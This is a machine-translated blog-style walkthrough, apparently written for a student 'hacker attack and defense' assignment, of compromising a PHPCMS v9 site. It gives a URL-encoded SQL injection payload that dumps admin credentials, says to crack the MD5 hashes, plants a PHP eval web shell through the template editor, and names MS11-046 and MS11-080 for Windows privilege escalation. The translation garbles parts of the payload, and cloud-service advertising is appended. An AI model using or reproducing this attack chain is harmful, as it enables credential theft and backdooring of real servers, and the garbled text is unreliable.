The end of the term is approaching. There are various assignments .. Computer learning cannot afford to hurt .. It is very interesting to say that we have a course called hacker attack and defense. The final assignment is the hacker station. I smiled .. A few days ago, the server was killed by sniffing on the server, and the Administrator's vulnerability was also supplemented. I wrote this article with my memory alone, and there were fewer images. sorry, please forgive me.
Target Site: http://www.bkjia.com/(instead of the target site, not this site)
One site: phpcmsv9 Injection Vulnerability
Baidu finds a way to exploit this vulnerability.
Register the user name directly on the website, and add this code after the Domain Name of the website to pop up the database name
Api. php? Op = add_favorite & url = xx. oo & title = % 2527
Here we can clearly see the Database Name and table name, and then replace the table name in the code.
Api. php? Op = add_favorite & url = xx. oo & title = % 2527% 2520and % 2520% 2528 select % 25201% 2520 from %
2528 select % 2520 count % 2528% 252a % 2529% 252 Cconcat % 2528% 2528 select % 2520% select
% 2520% 2528 select % 2520 concat % 25280 x 23% 252 Ccast % 2528 concat % 2528 username % 252C0x3a % 252C
Password % 252C0x3a % 252 Cencrypt % 2529% 2520as % 2520 char % 2529% 252C0x23% 2529% 2520 from
% 2520v9_admin % 2520 LIMIT % 25200% 252C1% 2529% 2529% 2520 from % 2520information_schema.tables
% 2520 limit % 25200% 252C1% 2529% 252 Cfloor % 2528 rand % 25280% 2529% 252a2% 2529% 2529x % 2520 from
% 2520information_schema.tables % 2520 group % 2520by % 2520x % 2529a % 2529% 2520and
% 2520% 25271% 2527% 253D % 25271
The password of the account is displayed, and md5 decryption is enough.
Go to the background, and choose template Management> template style>
Click Modify next to save the code.
<?
$ Fp = @ fopen ("c. php", 'A ');
@ Fwrite ($ fp, '<'.'? Php '. "\ r \ n". 'eval ($ _ POST [zmzsg100])'. "\ r \ n? "."> \ R \ n ");
@ Fclose ($ fp );
?>
Visualization after submission
Your Trojan client is generated in the root directory of the website.
Http://www.xxx.com/f4ck.php
Then you can connect to the control end...
Privilege Escalation seems simple. Read systeminfo.
No
KB2503665
KB2592799
Decisive MS11046, and then MS11080 .. Then there will be no more
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
